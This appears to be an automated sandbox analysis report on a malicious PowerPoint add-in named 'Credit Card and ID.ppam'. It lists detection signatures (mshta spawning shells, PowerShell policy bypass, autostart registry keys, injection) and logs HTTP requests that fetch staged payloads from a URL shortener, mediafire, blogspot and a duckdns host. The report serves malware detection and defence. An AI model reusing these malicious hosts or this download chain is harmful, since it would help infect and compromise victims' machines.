Windows Analysis Report Credit Card and ID.ppam

Overview

General Information

Sample Name: Credit Card and ID.ppam
Analysis ID: 528749
MD5: 6af8522af160215e3c0f8883588e20d0
SHA1: f7cde5b67c5aa15f8d4366337792e468257b3fda
SHA256: 1ca83ab27034a36bd899d91ed335e692afa949a4f1a1b30887e3f7d8651b63d1
Tags: ppam
Infos:

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Sigma detected: MSHTA Spawning Windows Shell
Creates autostart registry keys with suspicious values (likely registry only malware)
Sigma detected: Mshta Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Connects to a URL shortener service
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Credit Card and ID.ppam Virustotal: Detection: 23% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\30[1].htm Avira: detection malicious, Label: JS/Dropper.G4
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 67.199.248.16:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 205.196.123.58:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.45:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbrogr source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbiles source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbLE=C source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: j.mp
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443

Networking:

barindex
Uses dynamic DNS services
Source: unknown DNS query: name: www.starinxxxgkular.duckdns.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.16.203.237 104.16.203.237
Source: Joe Sandbox View IP Address: 104.16.203.237 104.16.203.237
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ODOASODOccomplermxjdajse HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/o7mbmqzedgahqhw/30.doc/file HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.mediafire.com
Source: global traffic HTTP traffic detected: GET /k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: ukey=6xpb2tazciakllrv4ebq5j0751h13hdfConnection: Keep-AliveHost: download1370.mediafire.com
Source: global traffic HTTP traffic detected: GET /p/30.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kdaoskdokaodkwldld.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1529571102-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-412f-a301-ebcedf46395e HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1397508952-widgets.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&go=true HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: accounts.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/errors/robot.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Connects to a URL shortener service
Source: C:\Windows\System32\mshta.exe DNS query: name: j.mp
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comN equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp String found in binary or memory: pspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleux"2 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
